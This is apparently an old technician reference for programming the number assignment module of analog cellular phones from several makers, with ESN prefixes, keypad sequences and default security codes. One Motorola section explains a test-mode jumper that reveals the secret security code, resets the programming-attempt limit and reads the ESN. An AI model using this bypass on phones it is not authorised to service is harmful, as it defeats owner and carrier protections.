                            X=2  Home
                            X=3  A Only
                            X=4  B Only
Press CLR to exit.

                      MITSUBISHI 301, 401, and 450
                NAM Type:  Tri-State
            Manufacturer:  Mitsubishi
              Programmer:  Curtis or Bytek
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

                   MIN 1:  XXX
                    Lock:  XXX
                   MIN 2:  XXX
        System ID Format:  XXXX

       Horn Alert Option:  1
        Handsfree Option:  1 (if equipped)
   End-to-End Signalling:  1
        Repertory Option:  1

         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  0000
        Local Use Option:  1

  Initial Paging Channel:  333 or 334
        Preferred System:  1(A) or 0(B)

                       MITSUBISHI 460 CRYSTAL ONE
                NAM Type:  Tri-State
            Manufacturer:  Toshiba
              Programmer:  Motorola, Curtis or Bytek
          ESN Prefix DEC:  138
                     HEX:  8A
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

    Manufacturer Options:
        Hex Address                     B7           B0
            13                          0 0 0 0 0 0 1 1
            14                          0 0 0 0 0 0 0 0
            15                          0 0 0 0 0 0 0 0
            16                          0 0 0 0 0 0 0 0
            17                          0 0 0 0 0 0 0 0
            18                          0 0 0 0 0 0 0 0
            19                          0 0 0 0 0 0 0 0
            1A                          0 0 0 0 0 0 0 0
            1B                          X X X X X X X X
            1C                          X X X X 0 0 0 0

        Address 13 - B0  A/B Switch
                   - B1  Call Timer
        Address 1B - B4-B7  Timer Clear Code
                            1st digit (Binary)
                     B0-B3  Timer Clear Code
                            2nd digit (Binary)
        Address 1C - B4-B7  Call Timer Code
                            3rd digit (Binary)

              Horn Alert:  FCN + 6 + Turn Ignition Off
         New Unlock Code:  NAM
           System Select:  FCN + 0 Toggles between (AB & BA)

           MOBIRA 300 SERIES, ME 57 AND ME 57A Transportable
                NAM Type:  EEPROM
            Manufacturer:  Mobira
              Programmer:  Handset, Service Handset or Curtis
          ESN Prefix DEC:  156
                     HEX:  96
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  ME57A
      Number of Channels:  666

    Programming Sequence:  Enter Local Mode with the following
                           sequence: * + 21057 + # + XXXXX + * (XXXXX = 12345 ;
                           from factory) else XXXXX = Current Security Code.
                           (Local Mode can also be entered with a service
                           handset using the sequence: 01 + #)
                           While noise will come from handset
                           Enter Programming Mode with the following
                           sequence:  48#
                           Press each step number, desired parameter then
                           * to enter data
                           Once data has been entered, press * to exit
                           Program Mode and return to Local Mode
                           To exit Local Mode, press 02# or power Off
                           ESN can be read in Local mode by pressing 44#
                           ESN will display in decimal. Press * to
                           convert ESN to hexidecimal

                       # of Digits
               System ID:  5     XXXXX + *
              MIN Option:  1    1 + *
               Local Use:  1    1 + *
           Mobile Number:  10   XXX-XXX-XXXX + *
           Station Class:  2    00 + *
    Initial Page Channel:  3    333 or 334 + *
         Access Overload:  2    XX + *
        Preferred System:  1    0 (B) or 1(A) + *
                Group ID:  2    XX + *
           Security Code:  5    XXXXX + *

    NAM Reading Sequence:  Enter Local Mode as listed above
                           Press 49# to enter NAM reading Mode
                           To read programmed values, enter step number
                           then press *
                           To Exiti NAM Reading Mode, press * and phone
                           will return to Local Mode
                           To exit Local Mode press 02# or Power Off

         New Unlock code:  SEL + LCK + (5 digit Security Code)
                           Current 4 digit Unlock code will display -
                           Preset 1234 + new 4 digit Unlock Code + SEL
                           System Select:  SEL + 1 + 1 + 1 etc (To scroll
                           Choices) + SEL (To Exit)
                                 A Only
                                 B Only
                                 S Standard AB or BA

              MOBIRA 400 SERIES (Trans) & 500 SERIES (Port)
                NAM Type:  EEPROM
            Manufacturer:  MOBIRA
              Programmer:  Handset
          ESN Prefix DEC:  156
                     HEX:  9C
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes, IF 5 digit Security Code is known
      Number of Channels:  666 or 832

    Programming Sequence:  Verify if 400 series phone has dual
                           NAM by the commands: MENU, FCN, NEXT, OK, FCN,
                           NEXT, OK 5, OK
      Phone will display:  TPA-4 for single NAM or TPA-4D for dual
                           Press FCN, CLR
                           Power On
                           Press MENU, FCN, NEXT, OK, FCN, NEXT, OK
                           An asterisk (*) should appear in display (if not,
                           Press FCN, CLR, and repeat above listed keys)
                           Enter Access Code *21057#.XXXXX.OK
                           XXXXX = 12345 (from factory) or currect code
                           Verify display "HOME SYS" for single NAM
                           phones or "SELECT USED NAM" for dual NAM
                           Use NEXT key to increment or FCN.NEXT to
                           decrement thru parameters
                           Press OK key to view current value of parameter
                           Store parameter value by pressing OK
                           Wait for value to disappear and parameter name to

                           To program 2nd number in Dual NAM phone,
                           return to "SELECT USED NAM"
                           Enable 2nd NAM by pressing OK
                           Program thru Group ID parameter for 2nd NAM
                           To write NAM information, press FCN.CLR,Power Off,
                           Power On

                       # of Digits
           NAM Selection:  None Primary/Optional
                 2nd NAM:  None Disable/Enable
               System ID:  5    XXXXX
              MIN Option:  1    0 or 1
               Local Use:  1    0 or 1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    XX
  Initial Paging Channel:  4    XXXX
         Access Overload:  2    XX
        Preferred System:  --   A or B
                Group ID:  2    XX
           Security Code:  5    XXXXX
        Mfg Control Date:  Preset at Factory
            Install Date:  6   XX/XX/XX

              Horn Alert:  N/A
         New Unlock Code:  Menu + FCN + NEXT + OK + NEXT + OK + NEXT + OK
                           (Continue pressing NEXT + OK until UNLOCK CODE
                           Upon pressing OK, SECURITY ID will appear. Enter
                           5 digit security code (NAM) and current unlock code
                           will appear.
                           Enter new 4 digit unlock code.
           System Select:  FCN + 1 then NEXT to change or OK to accept.
                           The selection will appear as follows:
                                 BA or AB
                                 Preferred only
                                 Non-Preferred Only

                      MURATA CT50 & MCT 200 Portable
                NAM Type:  EEPROM
            Manufacturer:  MURATA
              Programmer:  Keypad
          ESN Prefix DEC:  144
                     HEX:  90
 ESN, S/N Match Required:  No
    Stamped Model Number:  CT50 or MCT 200
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Power On while holding
                           Enter Program Code  314159
                           Software version will display
                           Press STO to advance to next step (System ID)
                           Repeatedly press 0 ("Clr", "Set" or "Pass"
                           will display)
                           Repeatedly press 0 until "Set" appears
                           Press STO + Enter System ID (digit+#+digit+#+digit+
                           # etc..)

                       # of Digits
               System ID:  5    XXXXX + #
           Mobile Number:  10    XXX-XXX-XXXX + #
           Security Code:  6     XXXXXX + #

         New Unlock Code:  FCN + 53 + 6 digit Security Code +
                           1 + STO + New 3 digit Unlock Code
           System Select:  FCN + 12 + 0 + 0 + 0 + 0 etc.
                           (one of the following will display)
                             Standard   AB or BA
                             A Only
                             B Only

Press STO to enter selection

                        MOTOROLA HANDSET PROGRAMMING


Step 1: Determine programming sequence from the following list.
~~~~~~~ This sequence will allow access to programming mode.

Handset or                      Model           Programming     Sellar
Portable Type                   Number          Sequence        Code
SCN 2004                        4500L           3               A
SCN 2005                        4500XL          3               A
SCN 2007                        3000            6               B
SCN 2022                                        6
SCN 2023                        6800XL          6               A
SCN 2033                                        5
SCN 2034                                        6
SCN 2042                        Credit Card     N/A
SCN 2043                        MC200,MODAR 4   4               C
SCN 2056                        1900,2200,2900
SCN 2080                        BLAUPUNKT       6
SCN 2081                                        5
SCN 2083                        6800XL          6               A
SCN 2084                                        2
SCN 2085                                        6
SCN 2090                        MC500           6               C
SCN 2094                        TOYOTA          6
SCN 2104                        AUDI            6
SCN 2115                                        6
SCN 2119                        4500XL          3
SCN 2120                        5000            6               B
SCN 2124                        2600,AC320      6               B,E
SCN 2126                                        4
SCN 2127                                        4
SCN 2128                                        4
SCN 2129                        DYNA-GRAY       4
SCN 2133                        6000X           1
SCN 2134                                        6
SCN 2144                        INFINITI        5
SCN 2165                                        4
SCN 2166                                        4
SCN 2168                                        4
SCN 2174                                        3
SCN 2175                                        4
SCN 2180                                        4
SCN 2194                        MC300           4               C
SCN 2195                                        6
SCN 2200                        PULSAR          4
SCN 2201                        PULSAR          4
SCN 2202                        PULSAR          4
SCN 2204                        MC500           4
SCN 2208                        SEARS           4
SCN 2209                        MONTGOMERYWORDS 4
SCN 2210                                        3
SCN 2222                        ACURA           6
SCN 2223                        ACURA FS        6
SCN 2238                        GM              6
SCN 2251                        DYNA-GRAY       6
SCN 2252                                        4
SCN 2259                        TRACER PULSAR   4
SCN 2260                        PCC             4
SCN 2278                        INFINITI        5
SCN 2282                        PIONEER         6
SCN 2283                        PIONEER         6
SCN 2295                                        6
SCN 2301                        LEXUS           6
SCN 2329                                        6
SCN 2330                        AC 250          6               E
SLN 2020                        6000X           1               A
SLN 2121                                        1
SLN 2025                        2000X           4               B
T180B                           NAUTILUS-bk     4
T180W                           NAUTILUS-wt     4
TLN 2659                        6000X           1               B
TLN 2674                        4000C/5000      2               B/C
TLN 2724                                        1
TLN 2726                                        2
TLN 2733                        6000            2               B
TLN 2734                                        2
TLN 2777                        2000X           4               B
TLN 2867                                        1
TLN 2879                                        2
UD71419                         ROLLS ROYCE     6
1632570                         GM              2
1644364                         GM              2
1648752                         GM              2
1648764                         GM              2
4410351C4                       A AUDI          6
750                                             2               C
8000BC                                          2               B
8000BCX                                         1               B
8000H                                           2
8500                                            1               A
869872106                       BLAUPUNKT       6
9000/ULTRA CLASSIC                              6               B/C
950/950X                                        2               B
9800XL                                          6               A
PERSONAL (w/ menu button)                       6
PERSONAL (w/o menu)                             1

        A: Motorola Direct
        B: US West Cellular
        C: McCaw (Cell One)
        D: LA Cellular
        E: Ameritech

Step 2: Once the phone model and sequence number are identified, determine
~~~~~~~ the program access sequence from this list.

  1     FCN + Security Code + Security Code + RCL
  2     STO + # + Security Code + Security Code + RCL
  3     CTL + 0 + Security Code + Security Code + RCL
  4     CTL + 0 + Security Code + Security Code + (*)
  5     FCN + 0 + Security Code + Security Code + MEM
  6     FCN + 0 + Security Code + Security Code + RCL

(*) CTL - Control button is either a button on keypad or the VOLUME
    button on the left side of the handset

NOTE: Factory Programmed Security Code is 000000

        Power On
        Enter program access sequence with 10 seconds
        Prompt 01 is displayed
        Repeatedly press * to increment (contents of locations
         are displayed)
        Press SEND to write NAM information
        (press # prior to SEND for 2nd Number)
        (to enable 2nd number, bit 5 step 10 must be
         enabled and phone must be software equipped
         for 2nd number)

STEP                        # of digits
1       System ID               5    XXXXX
2       Area Code               3    XXX
3       Mobile Number           7    XXX-XXXX
4       Station Class           2    XX
5       Access Overload         2    XX
6       Group ID                2    XX
7       Security Code           6    XXXXXX
8       Unlock Code             3    XXX
9       Initial Paging Channel  4    0333 or 0334
10      Program Opt(1)          6    XXXXXX
11      Program Opt(2)          3    XXX

Program Options
Step 10                         Step 11
~~~~~~~                         ~~~~~~~
Disable int speaker             Long tone DTMF
Local Use                       Handset Speaker
    Enable (carry phone only)
MIN Mark                        Eight Hour Timeout
   in Convertible
Auto Recall
Second phone #
 (must have software)

~~~~~~~~~ Motorola phones can be keypad programmed three times only and you
also must know the security code. The manual test mode will get you around
both obstacles. A mobile test adapter is needed to induce test mode. Manual
test mode will work on "F" series or newer only. (F,G,H,I,J etc..)
Model# F08G6789 is a "G" series
1. Turn phone Power Off
2. Mobiles/Transportable models- instal a jumper between pins 17 & 21
   on the data cable connector (RS232).
   Portable models- jumper pin #6 to Ground (Ground is the large,
   center contact on back of phone with battery removed)
3. Turn phone Power On
4. Press # button
5. Press 55# (to view NAM contents)
6. Repeatedly press * to step through NAM contents
7. Read and note 6 digit security code
8. Press * repeatedly until tick mark (') shows in display
9. Power OFF to exit manual test mode

Resetting three times counter:
1. Use jumper to place phone in test mode and Power On
2. Press #
3. Press 32 # (wait until tick mark (') shows in display)
4. Power Off to exit test mode

Reading ESN:
1. Place phone in test mode and Power On
2. Press #
3. Press 38#
4. Repeatedly press * to read entire ESN (00,01,02,03) 2 digits at
   a time
5. Press * until tick mark (') shows in display
6. Power phone off to exit manual test mode.

System Select Motorola Phones

MODEL #                 KEYPAD FUNCTION
1100                    CONTROL + * + * + * + etc.. until following appears
1500                    STD AB or STD BA"
1800                    SCAN BA or SCAN AB
2000X                   SCAN A
MC100                   SCAN B
MC200                   Press STO to enter selection

MODEL #                 KEYPAD FUNCTION
1900                    RCL + * + * + * + etc.. until following appears
2200                    STD AB or STD BA
4500XL                  SCAN BA or SCAN AB
TT22                    HOME
MC300                   SCAN A
Carry Phone             SCAN B
                        Press # to enter selection

MODEL #                 KEYPAD FUNCTION
750                     RCL + * + * + * + etc.. until following appears
750 "L" series          STD AB or STD BA
950                     SCAN BA or SCAN AB
950X                    HOME
2600                    SCAN A
3000                    SCAN B

MODEL #                 KEYPAD FUNCTION
PERSONAL TELEPHONE      RCL + * + * + * + etc.. until following appears
4000C                   STD AB or STD BA
5000                    SCAN BA or SCAN AB
6000                    HOME
6000X                   SCAN A
6000XL                  SCAN B
8000BC                  Enter SYS ID
8500                    Press STO to enter selection

2000R                   NOT APPLICABLE

MODEL #                 KEYPAD FUNCTION
6800XL                  MENU + 2 + 3 + STO + (* or scroll forward or
                        backward through to following choices)
                        STD AB or STD BA
                        SCAN BA or SCAN AB
                        SCAN A
                        SCAN B
                        PREFERRED SIDs (up to 5 SIDs, press STO to enter,
                        CLR to erase)
                        Press STO to enter selection
                        Press END to exit w/ no changes

MODEL #                 KEYPAD FUNCTION
PERSONAL TELEPHONE      FCN + MENU + 2 + 3 + STO or RCL + * (< or > to scroll)
                        STD AB or STD BA
                        SCAN BA or SCAN AB
                        SCAN A
                        SCAN B
                        ENTER SID (5 SIDs max)
                        Press STO to enter selection

2000                    N/A

MC200                   Control + 4 (Control button located on left side)

MC500                   FCN + 4

4000C                   AUX

6000                    MUTE

                New Unlock Code for Motorola's

MC100/200/300           N/A
Carry Phone

3000                    FCN + 0 + 6 digit security code + new 3 digit unlock
                        code + RCL

750 "L" series          STO + # + 6 digit security code + new 3 digit unlock
950X                    code + STO

5000(ver2)              FCN + 0 + 6 digit security code + new 3 digit unlock
                        code + STO

4500XL                  CONTROL + 0 + 6 digit security code + new 3 digit
                        unlock code + #

6000X                   FCN + 6 digit security code + new 3 digit unlock
8500                    code + STO

MC500                   FCN + 0 + 6 digit security code + new 3 digit unlock
TT5                     code + STO
9000/Ultra Classic

6800XL                  MENU + 5 + 4 + STO + 6 digit security code + new
PERSONAL TELEPHONE      3 digit unlock code.
 (w/o menu)

1100            1500            1500A           1800            2000
2000X           2000XSE         2000XT          3000            4000CMC200
5000MC400       6000XG          MC500           MC100

                NAM Type:  EEPROM
            Manufacturer:  Motorola
              Programmer:  Motorola 1801-CELPROG or Handset
          ESN Prefix DEC:  130
                     HEX:  82
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes (small style transciever and known
                           security code/manual test adpater)
      Number of Channels:  666 (smaller transcievers) else 832

            Phone Number:  XXX-XXX-XXXX
           Security Code:  XXXXXX
               Lock Code:  XXX
               System ID:  XXXXX
        Preferred System:  A or B
         Access Overload:  XX
                Group ID:  XX
              MIN Option:  Enabled
               Local Use:  Enabled
  Initial Paging Channel:  333 or 334
               Diversity:  Disabled (Enabled if equiped)
      Abbreviated Memory:  Enabled
    End-to-End signaling:  Enabled
              Horn Alert:  Enabled

        Standard Parameters
        Air Time Counter:  Enabled
        IMTS Combination:  Disabled
          Service Levels:  Enabled
           Service Level:  4
   Select System Program:  Enabled
             Auto Recall:  Enabled
               Lock Mode:  Enabled
     Handsfree Auto Mute:  Disabled
          Scrambler Opt.:  Disabled
             Test Mobile:  disabled
           Station Class:  XX (00-666 ch or 08-832 ch)
      Single System Scan:  Disabled
         Ext (n-1) Field:  disabled
  First Channel System A:  333
  First Channel System B:  334
Number of Dedicated
                Channels:  21

Option Bits
Hex Address             B7           B0
   1A                   0 0 0 0 0 0 0 0
   1B                   0 0 0 0 0 0 0 0
   1C                   0 0 0 0 1 0 0 0

Hex Address 1B - B0  Portable Scan
                     0=Portable, 1=Mobile
                 B3  Eight HR Timeout
                     0=Enable, 1=Disable
                 B5  Long Tone DTMF
                     0=Disable, 1=Enable

Hex Address 1C - B3  Disable Handset Speaker - Handsfree Applications

                      MOTOROLA TT2, TT3, TT5, TT22
                NAM Type:  EEPROM
            Manufacturer:  Motorola
              Programmer:  Motorola 1801-CELPROG or Handset
          ESN Prefix DEC:  130
                     HEX:  82
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes (small transciever & known security code)
      Number of Channels:  666 or 832

            Phone Number:  XXX-XXX-XXXX
           Security Code:  XXXXXX
               Lock Code:  XXX
               System ID:  XXXXX
        Preferred System:  A or B
         Access Overload:  XX
                Group ID:  XX
              MIN Option:  Enabled
               Local Use:  Enabled
  Initial Paging Channel:  333 or 334
               Diversity:  Disabled (Enabled if Equipped)
      Abbreviated Memory:  Enabled
         End-to-End DTMF:  Enabled
              Horn Alert:  Enabled

        standard parameters
        Air Time Counter:  Enabled
        IMTS Combination:  Disabled (Enabled if Equipped)
          Service Levels:  Enabled
           Service Level:  4
   Select System Program:  Enabled
             Auto Recall:  Enabled
               Lock Mode:  Enabled
     Handsfree Auto Mute:  Disabled

           Scrambler Opt:  Disabled
             Test Mobile:  disabled
           Station Class:  XX(00-666 ch or 08-832 ch)
      Single System Scan:  Disabled
          Ext(n-1) Field:  Disabled
  First Channel System A:  333
  First Channel System B:  334
Number of Dedicated
                Channels:  21

Option Bits:
Hex Address             B7           B0
   1A                   0 0 0 0 0 0 0 0
   1B                   0 0 1 0 0 0 0 1
   1C                   0 0 0 0 0 0 0 0

Hex Address 1B - B0  Portable Scan
                     0=Portable, 1=Mobile
                 B3  Eight HR Timeout
                     0=Enable, 1=Disable
                 B4  Handset Speaker
                     0=Disabled, 1=Enabled
                 B5  Long Tone DTMF
                     0=Disabled, 1=Enabled

Hex Address 1C - B3  Call Processing Speaker
                     1=Disable, 0=Enable

                       NEC 1000, 3500, 5000 and 7000
                NAM Type: PROM (Open collector)
            Manufacturer:  NEC
              Programmer:  Curtis or Bytek
           EN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format: XXX-XXX-XXXX
                          Lock Code (1000) or
           Security Code:  XXX
        System ID Format:  XXXXX

       Horn Alert Option:  1
        Handsfree Option:  0
   End-to-End Signalling:  1
        Repertory Option:  1
         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  0000 (Binary)
        Local Use Option:  1
              MIN Option:  1
  Initial Paging Channel:  333 or 334
        Preferred System: 0 (B) or 1 (A)

                          NEC 3700, 4500 & 4600
                NAM Type:  EEPROM
            Manufacturer:  NEC
              Programmer:  Handset with NEC adaptor
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
     Hanset Programmable:  Yes with NEC adaptor
      Number of Channels:  NEC 3700:  832
                           NEC 4500:  666
                           NEC 4600:  832
    Programming Sequence:  Insert Programming adaptor in series
                            with data cable at transceiver
                           Attach load to antenna port
                           Power On
                           Enter test mode:  RCL + # + 01
  Enter programming mode:  RCL + # + 71
                           Press # to enter data and increment
                           To exit programming mode hold CLR
       To exit test mode:  RCL + # + 02

                       # of Digits
           Mobile Number:  10   XXX-XXX-XXXX
               Lock Code:  4    XXXX
               System ID:  5    XXXXX
                Group ID:  2    XX
 Initial Paging Channels:  3    333 or 334
        Preferred System:  1    0 (B) or 1 ( A)
         Access Overload:  2    XX
              MIN Option:  1    1

(If phone has dual software (579D/IC505/VS.1) in socket IC505, then follow
 NEC 4700 Dual NAM instructions)

              Horn Alert:  FCN + 3
         New Unlock Code:  NAM
           System Select:  FCN + 5 + 5 + 5 etc.. (until following appears)
                             Standard AB or BA
                             H only
                             A only
                             B only

                             NEC 3800 & 4800
                NAM Type:  EEPROM
            Manufacturer:  NEC
              Programmer:  Handset with NEC Program Adaptor
                           (Part #41-2019 and Conversion Cable (Part #19-0157)
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Connect programming adaptor
                            and cable to transceiver
                           Power On with PWR button
         Enter test mode:  RCL + # + 0 + 1
                           Select NAM number with the following sequence
                            3800 (0 or 1)
                            4800 (0, 1, 2 or 3)
                           Press RCL + # + 7 + 6 + X + #
                                 X=0  NAM 1
                                 X=1  NAM 2
                                 X=2  NAM 3-4800 only
                                 X=3  NAM 4-4800 only
  Enter programming mode:  RCL + # + 7 + 1
                           Press # to enter data and increment
                           To exit programming mode hold CLR
       To exit test mode:  RCL + # + 0 + 2

                       # of Digits
        Mobile of Number:  10   XXX-XXX-XXXX + #
               Lock Code:  4    XXXX + #
               System ID:  5    XXXXX + #
                Group ID:  2    XX + #
  Initial Paging Channel:  3    333 or 334 + #
        Preferred System:  1    0 (B) or 1(A) + #
              MIN Option:  1    1 + #
               Local Use:  1    1 + #
        Emergency Number:  3    911 + #

Press CLR to exit programming mode
Press RCL + # + 02 to exit test mode

             Display ESN:  Insert Adaptor
         Enter test mode:  RCL + # + 01
                           Press RCL + # + 24 (ESN will display)
                           Press RCL + # + 02 (to exit test mode)

        Horn Alert(3800):  FCN + 3 (Press 3 again to toggle) +
                           turn ignition off
        Horn Alert(4800):  FCN + 81 + (+ or - key to toggle) + STO
                           + turn ignition off
         New Unlock Code:  NAM

     System Select(3800):  FCN + 5 + 5 + 5 + etc.. (following will appear)
                                 Standard AB or BA
                                 Home Only
                                 System A only
                                 System B only
Press CLR to exit

    System Select(4800):  FCN + 5 + 3 + (+ or - to scroll choices)
                          + STO + CLR
        Choices Include:  Standard AB or BA
                          Home only
                          A only
                          B only

                               NEC 4700
                NAM Type:  EEPROM
            Manufacturer:  NEC
              Programmer:  Handset with NEC program adaptor
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes, with NEC adaptor
      Number of Channels:  832

    Programming Sequence:  Insert Programming adaptor in series
                            with cable at transceiver
                           Attach load to antenna port
                           Power On
         Enter test mode:  RCL + # + 01
                           Press RCL + # + 760 + # (NAM 1)
                           Press RCL + # + 761 + # (NAM 2)
                           Select NAM 1 or 2 only if dual NAM equipped
  Enter programming mode:  RCL + # + 71
                           Press # to enter data and increment
                           To exit programming mode hold CLR
       To exit test mode:  RCL + # + 02

                      # of digits
           Mobile Number:  10    XXX-XXX-XXXX + #
               Lock code:  4    XXXX + #
               System ID:  5    XXXXX + #
                Group ID:  2    XX + #
  Initial Paging Channel:  3    333 or 334 + #
        Preferred System:  1    0 (B) or 1 (A) + #
              MIN Option:  1    1 + #
               Local Use:  1    1 + #

(If phone has dual name software (579D/IC505/V2.1) in socket IC505,
 then follow dual NAM instructions)

             Display ESN:  Insert Program adaptor
         Enter Test mode:  RCL + # + 01
                           Press RCL + # + 24 (ESN will display)
                           Press RCL + # + 02 (To exit Test mode)

              Horn alert:  FCN + 3 + Turn Ignition Off
         New Unlock Code:  NAM (Optional temporary lock is also available)
           System Select:  FCN + 5 + 5 + 5 + etc.. (following will appear)
                                 Standard AB or BA
                                 Home Only
                                 System A only
                                 System B only

Press CLR to exit

                        NEC 9000 & 9100 Portable
                NAM Type:  EEPROM
            Manufacturer:  Handset
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes, provided programming adaptor
                            and charger are available)
      Number of Channels:  832

    Programming Sequence:  Remove portable battery
                           Replace with fully charged NEC programming adaptor
                           Power On
                           Place protable in charger
                           (9100 only) Select on of multiple NAMs with
            the sequence:  FCN + STO + 3 + 3 (to toggle)
         Enter test mode:  RCL + # + 01
                           If error appears, press RCL + # + 02 to clear
  Enter programming mode:  RCL + # + 71
                           Phone number will display
                           Press # to enter data and increment
                           To exit programming mode hold CLR
       To exit test mode:  RCL + # + 02

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX
               Lock Code:  4    XXXX
               System ID:  5    XXXXX
        Preferred System:  1    0 (B) or 1 (A)
         Access Overload:  2    XX
  Initial Paging Channel:  3    XXX
              MIN Option:  1    1

         New Unlock code:  NAM
(An optional tempory lock is also available on this mode)
           System Select:  FCN + 5 + 5 + 5 + etc..
(Until one of the following appears)
                 Standard AB or BA
                 Home Only
                 Sys A only
                 Sys B only

Press CLR to exit.

                       NEC P200 & P300 Portable
                NAM Type:  EEPROM
            Manufacturer:  NEC
              Programmer:  Keypad with adaptor (Part #41-2019)
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Insert Program adaptor into bottom of
                           protable (before serial number power on 135-839601)
       Select NAM Number:  RCL + # + 76 + NAM Number (0-3) + #
                           Programming NAMs in sequential order only
      Enter Program Mode:  RCL + # + 71
                           Enter information for each step, then press # to
                            store parameters
                           Press and hold CLR to program data and exit program
                           Press RCL + # + 02 (to exit Test mode)

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX + #
               Lock Code:  4    XXXX + #
               System ID:  5    XXXXX + #
                Group ID:  2    XX + #
  Initial Paging Channel:  4    0333 or 0334 + #
           System Select:  1    1(A) or 0(B) + #
         Access Overload:  2    XX + #
              MIN Option:  1    1 (Enable) + #
               Local Use:  1    1 (Enable) + #
        Emergency Number:  3    XXX + #

Press CLR to exit
Press RCL + # + 02 (to exit test mode)
Remove Program Adaptor

         New Unlock Code:  NAM
     System Select(P200):  FCN + 5 + 5 + 5 + ect.. (following will appear)
                                 Standard AB or BA
                                 Home Only
                                 Sys A Only
                                 Sys B Only

     System Select(P300):  FCN + 53 + #(or Vol Up/Down to scroll options)
         Options Include:  AB or BA
                           A Only
                           B Only

Press STO to enter selection, CLR to Exit.

                       NEC P400 & P600 Portables
                NAM Type:  EEPROM
            Manufacturer:  NEC
              Programmer:  Keypad with adaptor (Part #NECAM 150-0268) and
                            conversion cable (Part #NECAM 204-0324)
          ESN Prefix DEC:  135
                     HEX:  87
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  P400 or P600
      Number of Channels:  832

        Program Sequence:  Connect program adaptor to conversion cable
                           Plug conversion cable into portable
                           Power On and way for phone initialize.
                           Enter # + 71 to enter test mode
       Select NAM Number:  RCL + # + 71 + # (For NAM
                           #1) or RCL + # + 71 + NAM Number (2-4) + #
                           (P400 has 2 NAMs and P600 has 4 NAMs)
                           Program NAMs in sequential order only
                           Enter information for each step, then press # to
                            store parameter.
                           Press and Hold CLR to program data and exit program
                           Press RCL + # + 02 to return to standby.

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX + #
               Lock Code:  4    XXXX + #
               System ID:  5    XXXXX + #
                Group ID:  2    XX + #
  Initial Paging Channel:  4    0333 or 0334 + #
           System Select:  1    1(A) or 0(B) + #
         Access Overload:  2    XX + #
              MIN Option:  1    1 (Enable) + #
               Local Use:  1    1 (Enable) + #
        Emergency Number:  3    XXX + #
                FCN Stat:  1    0 + #

Press CLR to exit
Press RCL + # + 02 (to exit test mode)
Remove program adaptor

         New Unlock Code:  NAM
Program Permanent Memory:  Connect Adaptor and covnersion cable to
    portable telephone. Memory locatoins 70 through 99 can be programmed
    with non-erasable numbers.

With cable and adaptor in place, Power phone "On". Enter telephone
number + STO + memory location(70-99)

          System Select:  FCN + 54 + RCL + RCL + RCL (to scroll choices)
         Option Include:  AB or BA, Home, A Only, B Only

Press CLR to exit.

                     NOKIA 101 & 1000 Portables
                NAM Type:  EEPROM
            Manufacturer:  NOKIA
              Programmer:  Keypad (Provided current security code is known-if
                           not, service adaptor is necessary to access program
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  101:  THA - 6
                          1000:  THA - 62
      Number of Channels:  832

    Programming Sequence:  Power On
      Enter Program Mode:  * + 3001 + # + XXXXX + STO + 0
                            XXXXX = 12345 (new phones)
                            XXXXX = current security code
                           "Store Not Done" will display
                           If "Not Allowed" displays, verify that the correct
                            code has been entered.
                           This phone programs in 5 steps with multiple
                            parameters into each step.
                           The # and * keys are used to separate NAM
                            parameters within the step
                           To verify paramteres, Press RCL + Step Number(01-05)
                           Once programming is complete, power phone Off
                            then On to exit program mode.

Step                             # of digits
01      Emergency Number, #, Emergency          911#*911#0*1234 + STO
        Number, #, Language (0=English,         + 01 + STO + CLR +
        1=French, 2=Spanish). * and             Unlock Code

02      Mobile Number 1 (10 digits)             XXX-XXX-XXXX + STO + -2 + CLR

03      SID, *, MIN Option, *, Local Use,       XX*1*1*XXX*XX*XX + STO + 03
        *, Initial Page Channel, *,             + STO + CLR
        Access Overload, *, Group ID (NAM1)

04      Mobile Number 2 (Ten digits)            XXX-XXX-XXXX + STO + 04 +
                                                STO + CLR

05      SID, *, MIN Option, *, Local Use,       XX*1*1*XXX*XX*XX + STO + 03
        *, Initial Page Channel, *,             + STO + CLR
        Access Overload, *, Group ID (NAM1)

Power Phone Off and On to complete programming

         New Unlock Code:  NAM
           System Select:  SEL + 1 + 1 + 1 etc (to scroll choices)
                           Home, A, B, Both AB and BA

                       NOKIA-MOBIRA LX-11 & M-11
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  Handset or LX-11 Service Handset
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes, either a match or subtract 737856
                            from serial number.
    Handset programmable:  Yes, security code must be known
      Number of Channels:  832

    Programming Sequence:  Power On
  Enter Programming Mode:  * + 3001 + # + XXXXX
                           + SEL + 9 + END
                            XXXXX=12345 (from factory) or
                            XXXXX=Current Security Code
